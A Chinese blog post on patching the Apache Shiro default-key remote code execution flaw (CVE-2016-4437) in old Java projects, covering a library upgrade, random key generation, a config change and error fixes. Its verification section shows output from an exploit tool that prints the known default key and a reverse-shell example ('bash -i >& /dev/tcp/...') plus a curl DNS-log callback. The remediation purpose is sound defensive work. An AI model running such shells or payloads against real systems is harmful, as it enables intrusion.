Java项目中修复Apache Shiro 默认密钥致命令执行漏洞(CVE-2016-4437)详细说明

最新推荐文章于 2025-05-10 17:02:36 发布
原创 最新推荐文章于 2025-05-10 17:02:36 发布
· 4.1k 阅读 · 5 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #spring #jdk #maven #tomcat

目录

1.漏洞说明

1.1阿里云漏洞短信内容

1.2阿里云漏洞详细报告

2.详细修复步骤

2.1下载漏洞验证工具

3.Java项目修改

3.1修改前注意事项

3.2Jar包准备

3.3增加一个自定义秘钥代码

3.4修改shiro配置

3.5修复后漏洞检测结果

4.常见问题

 4.1Unsupported major.minor version 52.0

4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter报错

4.3 java.lang.NoClassDefFoundError: org/owasp/encoder/Encode

最近阿里云发了漏洞短信,需要在以后的老项目中修复漏洞,修复了6套Java项目,不同项目修复方式有所不同,特写此篇博客,以作备忘,欢迎大家留言讨论。

1.漏洞说明

1.1阿里云漏洞短信内容

1.2阿里云漏洞详细报告

2.详细修复步骤

2.1下载漏洞验证工具

漏洞验证工具:https://github.com/wyzxxz/shiro_rce,或者从http://www.zrscsoft.com/sitepic/12120.html中下载

下载的shiro_tool.jar文件,建设保存在D:\download目录,即

根据阿里云漏洞报告,

执行D:\work\jdk1.8.0\bin\java.exe -jar shiro_tool.jar http://{您的IP地址}命令,

具体如下:

D:\download>D:\work\jdk1.8.0\bin\java.exe -jar shiro_tool.jar http://{您的IP地址}
[-] target: http://{您的IP地址}
[-] target is use shiro
[-] start guess shiro key...
[-] use shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check Groovy1
[-] check JSON1
[-] check Spring1
[-] check Spring2
[-] check Jdk7u21
[-] check JRMPClient
[-] check ROME
[-] check Clojure
[*] find: CommonsCollections10 can be use
[*] find: JRMPClient can be use
0: CommonsCollections10
1: JRMPClient
[-] please enter the number(0-1)
> 0
[-] use gadget: CommonsCollections10
[*] command example: bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 , command example: curl dnslog.xxx.com
[*] if need base64 command, input should startwith bash=/powershell=/python=/perl=
[-] please enter command, enter q or quit to quit, enter back to re-choose gadget
> quit
[-] quit

D:\download>

3.Java项目修改

3.1修改前注意事项

shiro需要升级到1.7.0

shiro1.7.0的spring相关jar要求在4.0版本以上

spring4.0以上版本要求jdk1.8.0以上

3.2Jar包准备

shiro1.7.0的jar如下:

shiro-core-1.7.0.jar

shiro-ehcache-1.7.0.jar

shiro-spring-1.7.0.jar

shiro-web-1.7.0.jar

spring相关jar要求在4.0版本以上,这里建设更新到spring-5.2.10.RELEASE版本,

spring-5.2.10.RELEASE版本相关的jar,请参考https://blog.youkuaiyun.com/jlq_diligence/article/details/109771710博客,自行下载

我这边需要的jar大致如下,不同的项目有所不同

3.3增加一个自定义秘钥代码

参考官方的:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()

  1. import org.apache.shiro.codec.Base64;
  2. import org.apache.shiro.crypto.AbstractSymmetricCipherService;
  3. import org.aspectj.apache.bcel.generic.IINC;
  5. import javax.crypto.KeyGenerator;
  6. import javax.crypto.SecretKey;
  8. import java.security.Key;
  9. import java.security.NoSuchAlgorithmException;
  11. /**
  12. * shiro 秘钥生成器
  13. *
  14. * @author admin shiro有自己的随机生成秘钥的方法 秘钥生成器
  15. *
  16. *
  17. */
  18. public class MySymmetricCipherService extends AbstractSymmetricCipherService {
  22. protected MySymmetricCipherService(String algorithmName) {
  23. super(algorithmName);
  24. // TODO Auto-generated constructor stub
  25. }
  27. public static byte[] generateNewKeyFromSuper() {
  28. KeyGenerator kg;
  29. try {
  30. kg = KeyGenerator.getInstance("AES");
  31. } catch (NoSuchAlgorithmException var5) {
  32. String msg = "Unable to acquire AES algorithm. This is required to function.";
  33. throw new IllegalStateException(msg, var5);
  34. }
  36. kg.init(128);
  37. SecretKey key = kg.generateKey();
  38. byte[] encoded = key.getEncoded();
  39. return encoded;
  40. }
  44. /**
  45. * 使用shiro官方的生成
  46. * org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()
  47. * @return
  48. */
  49. public static byte[] getCipherKey() {
  50. MySymmetricCipherService mySymmetricCipherService = new MySymmetricCipherService("AES");
  51. Key gKey = mySymmetricCipherService.generateNewKey();
  52. return gKey.getEncoded();
  53. }
  55. public static void main(String[] args) {
  56. MySymmetricCipherService mySymmetricCipherService = new MySymmetricCipherService("AES");
  57. Key gKey = mySymmetricCipherService.generateNewKey();
  58. System.out.println("key: " + gKey.getEncoded());
  59. System.out.println("key Base64.encodeToString: " + Base64.encodeToString(gKey.getEncoded()));
  61. byte[] decodeValue = org.apache.shiro.codec.Base64.decode("t0EWNQWKMXYzKTDSQpNNfg==");
  62. System.out.println("decodeValue: " + decodeValue);
  63. }
  64. }

3.4修改shiro配置

例如shiro配置文件为spring-shiro.xml,不同项目,文件名有所不同,修改的位置,大致如下

    <!-- 定义Shiro安全管理配置 -->
    <bean id="securityManager" class="org.apache.shiro.web.mgt.DefaultWebSecurityManager">
        <property name="realm" ref="shiroDbRealm" />
        <property name="cacheManager" ref="cacheManager" />
        <!-- 加入rememberMe的配置管理 -->
        <property name="rememberMeManager" ref="rememberMeManager" />
    </bean>


    <!-- rememberMe管理器   -->
    <bean id="rememberMeManager" class="org.apache.shiro.web.mgt.CookieRememberMeManager">
        <property name="cipherKey" value="#{T(com.**.realm.MySymmetricCipherService).getCipherKey()}" />
        <property name="cookie" ref="rememberMeCookie" />
    </bean>

    <!-- remenberMe配置 -->
    <bean id="rememberMeCookie" class="org.apache.shiro.web.servlet.SimpleCookie">
        <constructor-arg value="rememberMe" />
        <property name="httpOnly" value="true" />
        <!-- 默认记住7天(单位:秒) -->
        <property name="maxAge" value="604800" />
    </bean>

3.5修复后漏洞检测结果

4.常见问题

 4.1Unsupported major.minor version 52.0

【现象】

java.lang.UnsupportedClassVersionError: org/apache/shiro/crypto/AbstractSymmetricCipherService : Unsupported major.minor version 52.0
    at java.lang.ClassLoader.defineClass1(Native Method)
    at java.lang.ClassLoader.defineClass(ClassLoader.java:800)
    at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
    at java.net.URLClassLoader.defineClass(URLClassLoader.java:449)
    at java.net.URLClassLoader.access$100(URLClassLoader.java:71)
    at java.net.URLClassLoader$1.run(URLClassLoader.java:361)
    at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
    at java.security.AccessController.doPrivileged(Native Method)
    at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
    at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
    at java.lang.ClassLoader.loadClass(ClassLoader.java:358)

【解决方法】JDK更换为JDK1.8    

详细描述如下:

当改变了jdk版本时,在编译java时,会遇到Unsupported major.minor version错误。
jdk版本和stanford parser对应关系

JDK版本和Java编译器内部的版本号

J2SE 8 = 52,
J2SE 7 = 51,
J2SE 6.0 = 50,
J2SE 5.0 = 49,
JDK 1.4 = 48,
JDK 1.3 = 47,
JDK 1.2 = 46,
JDK 1.1 = 45

4.2org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter报错

【解决方法】

<bean class="org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter">
修改为:
<bean class="org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter">


4.3 java.lang.NoClassDefFoundError: org/owasp/encoder/Encode

【现象】

java.lang.NoClassDefFoundError: org/owasp/encoder/Encode
    org.apache.shiro.web.filter.PathMatchingFilter.pathsMatch(PathMatchingFilter.java:134)
    org.apache.shiro.web.filter.PathMatchingFilter.preHandle(PathMatchingFilter.java:186)
    org.apache.shiro.web.servlet.AdviceFilter.doFilterInternal(AdviceFilter.java:131)
    org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
    org.apache.shiro.web.servlet.ProxiedFilterChain.doFilter(ProxiedFilterChain.java:66)
    org.apache.shiro.web.servlet.AbstractShiroFilter.executeChain(AbstractShiroFilter.java:4
【解决方法】
添加 encoder-1.2.2.jar

详细操作和文件,可以参考http://www.zrscsoft.com/sitepic/12120.html

Apache Shiro 默认密钥命令执行漏洞CVE-2016-4437)【远程扫描】
DK_ajie的博客
02-24 5548
漏洞详情 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。攻击者可以使用Shiro默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 目标IP站点存在Apache shiro 已知密钥泄露导致的远程代码执行漏洞。通过查找项目源码发现,在shiro的配置文件里,确实写死了一个秘钥,在开发环境的中不建议直接写死秘钥,大家要引以为戒! 后面通过源码分析,发现了shiro有自己的随机生成秘钥的方法。既然找到的方法,那
Shiro550 反序列化漏洞CVE-2016-4437
qq_68163788的博客
06-20 1282
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
Apache Shiro 1.2.4 反序列化漏洞CVE-2016-4437)
最新发布
spinage的博客
05-10 444
攻击者可利用该漏洞通过伪造的 RememberMe Cookie 触发恶意代码执行
ShiroApache Shiro 默认密钥命令执行漏洞CVE-2016-4437)的解决方案
No8g攻城狮的博客
12-07 5384
Apache Shiro 默认密钥命令执行漏洞CVE-2016-4437)的解决方案
Apache Shiro 默认密钥命令执行漏洞
Loveme_CN的博客
11-18 5621
Apache Shiro 默认密钥命令执行漏洞1、 漏洞描述:2、漏洞特征:3、修复建议:4、修复过程JAR包升级修复RemberMe功能 今天登录服务器上面提示有漏洞提示:Apache Shiro 默认密钥命令执行漏洞CVE-2016-4437)【远程扫描】,接下来吾爱编程为大家介绍一下Apache Shiro 默认密钥命令执行漏洞修复方法,有需要的小伙伴可以参考一下 1、 漏洞描述: Apache Shiro 是ASF旗下的一款开源软件,它提供了一个强大而灵活的安全框架,提供身份验证、授权、
Apache Shiro 默认密钥命令执行漏洞CVE-2016-4437
yuguang的博客
11-17 1万+
目录 一.情况描述 1.漏洞描述 2.漏洞造成的影响 3.安全建议 4.技术参考 5.建设方案 6.漏洞证明 测试结果 二.springmvc修改 1.修改pom.xml配置 2.增加一个自定义秘钥代码 3.修改shiro配置 4.修改完之后测试 一.情况描述 1.漏洞描述 Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。 2.漏洞造成的影响 在配置了默认密钥的情况下,攻击者可以通过精心构造的 Payload 实现远.
shiro反序列化漏洞复现(CVE-2016-4437
m0_70349048的博客
05-19 762
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
详细shiro漏洞复现及利用方法(CVE-2016-4437
热门推荐
dreamthe的博客
04-26 3万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3019
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 默认密钥命令执行漏洞(反序列化攻击)
weixin_42845320的博客
06-24 3255
一、漏洞说明 最近阿里云发了漏洞短信,需要在已有的老项目修复shiro远程命令执行漏洞,并修复了2套Java项目,不同项目修复方式有所不同,特写此篇博客,以作备忘,欢迎大家留言讨论。 1.1 漏洞描述 漏洞名称: 远程命令执行,利用漏洞能够获取系统权限,查看、篡改系统数据,构成信息泄露和运行安全风险 1.2 处置措施建议 针对远程命令执行漏洞,升级Shiro至最新版本,并且重新生成一个新的秘钥替换ciperKey,保证唯一且不要泄密; 二、漏洞修复过程 2.1 修改前事项 shiro需要升级到1.7.1
Spring Apache Shiro 默认密钥命令执行漏洞CVE-2016-4437)问题解决
北巷东东的专栏
11-19 3766
最近阿里云发了漏洞短信,需要在以后的老项目修复漏洞,不同项目修复方式有所不同,特写此篇博客记录。 先说下,我们老项目用的shiro版本号是1.2.4,对应spring版本为4.x 漏洞 漏洞详细报告 OK,我们了解到报告的具体内容了,那接下来,我们分析下怎么修复 漏洞检测工具 下载地址和使用说明: https://github.com/wyzxxz/shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 下载下来是这样
X-ray捡洞中遇到的高频漏洞Shiro默认key、备份文件&敏感目录泄露、Druid未授权访问、phpstudy-nginx解析
begefefsef的博客
04-11 3183
文章首发于Freebuf https://www.freebuf.com/articles/web/304364.html 用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危 文章目录 直接利用 Shiro默认key Sql注入 备份文件&敏感目录泄露 Druid未授权访问 XSS 有条件利用 phpstudy-nginx解析漏洞 dedecms-cve-2018-6910 鸡肋 Apa..
初始shiro
weixin_45750514的博客
10-12 789
Apache ShiroJava 的一个安全框架Shiro 可以非常容易的开发出足够好的应用,其不仅可以用在JavaSE 环境,也可以用在JavaEE 环境。Shiro 可以帮助我们完成:认证(登录)、授权(角色,权限)、加密(pass加密)、会话管理、与Web 集成、缓存等。 package com.xiexin.shiroTest; import org.apache.shiro.SecurityUtils; import org.apache.shiro.authc.Incorre
X-ray捡洞中遇到的高频漏洞Shiro默认key、备份文件&敏感目录泄露、Druid未授权访问、phpstudy-nginx解析漏洞、dedecms-cve-2018-6910)
Love&Share
11-10 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危 文章目录直接利用Shiro默认keySql注入备份文件&敏感目录泄露Druid未授权访问XSS有条件利用phpstudy-nginx解析漏洞dedecms-cve-2018-6910鸡肋Apache Tomcat Examples未删除go-pprof资源监控信息泄露ELSE配置xray反连360提交漏洞 直接利用 Shiro默认key Xray提示:shiro/s.
Spring Boot项目Shiro1.7.1版本默认密钥漏洞
UDWORLD的博客
09-06 3362
Shiro1.7.1版本默认密钥漏洞
shiro反序列化漏洞修复(使用随机密钥
m0_67391121的博客
08-24 1333
说明shiro低版本使用固定默认密钥,有被攻击的风险,可以升级shiro版本,Apache官方已在1.2.5及以上版本中修复漏洞,但是此方式有依赖冲突的风险。这里说说不升级版本的解决方案,这方案和官方的方案一样,都是使用生成的随机密钥。2、配置shiro安全管理器,使用密钥生成工具生成的随机密钥。1、创建随机生成密钥工具。
shiro 修改默认加密方式
lwb6096的博客
04-24 6671
        @Bean public PasswordService getPasswordService() { DefaultPasswordService service = new DefaultPasswordService(); DefaultHashService defaultHashService = new DefaultHashService(); // de...
Pd-CMS Shiro默认密钥 远程命令执行漏洞
03-24
### Pd-CMS Shiro 默认密钥远程命令执行漏洞分析 #### 漏洞概述 Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,用于身份认证、授权、加密和会话管理。然而,在某些情况下,开发人员可能会使用默认的 AES 密钥来保护 Shiro 的会话数据。如果攻击者能够获取此默认密钥,则可以通过伪造或篡改会话令牌实现任意代码执行。 对于 Pd-CMS 中存在的 Shiro 默认密钥问题,其根本原因在于未更改默认的 `rememberMe` 加密密钥 `aes:kPH+bIxk5D2deZiIxcaaaA==` 或其他硬编码密钥[^3]。这使得攻击者有机会通过反序列化漏洞注入恶意代码并获得目标系统的控制权限。 #### CVE 编号与影响版本 该类漏洞通常被标记为 **CVE-2016-4437**,主要涉及 Apache Shiro 版本低于 1.2.4 的应用程序。具体到 Pd-CMS 软件而言,任何依赖于旧版 Shiro 并保留原始配置的应用实例均可能受到影响。 #### 解决方案 为了防止因 Shiro 默认密钥引发的安全隐患,建议采取以下措施: 1. 更改默认密钥修改 Shiro 配置中的 `rememberMe` 加密密钥为强随机字符串,并将其存储在安全位置而非源码中。例如: ```properties shiro.rememberMe.cookie.name=rememberMe securityManager.rememberMeManager.cipherKey=base64:A_custom_strong_key_here== ``` 2. 更新至最新稳定版本: 升级所使用的 Shiro 库到至少 1.2.4 及以上版本,这些新版本已经改进了默认行为以减少风险。 3. 实施输入验证机制: 对所有外部提交的数据实施严格的校验逻辑,阻止非法参数进入业务流程。 4. 使用 WAF 或 IDS 工具监控异常流量模式: 借助 Web 应用防火墙 (WAF) 和入侵检测系统 (IDS),识别潜在威胁活动并及时响应处理。 5. 定期审查第三方组件状态: 关注官方公告以及社区反馈信息,确保第一时间修补已知缺陷。 ```bash # 示例:检查当前项目内的Shiro库版本 mvn dependency:tree | grep apache-shiro ``` 上述操作有助于显著降低遭受基于 Shiro 默认密钥攻击的可能性。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微笑点燃希望

你的鼓励是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值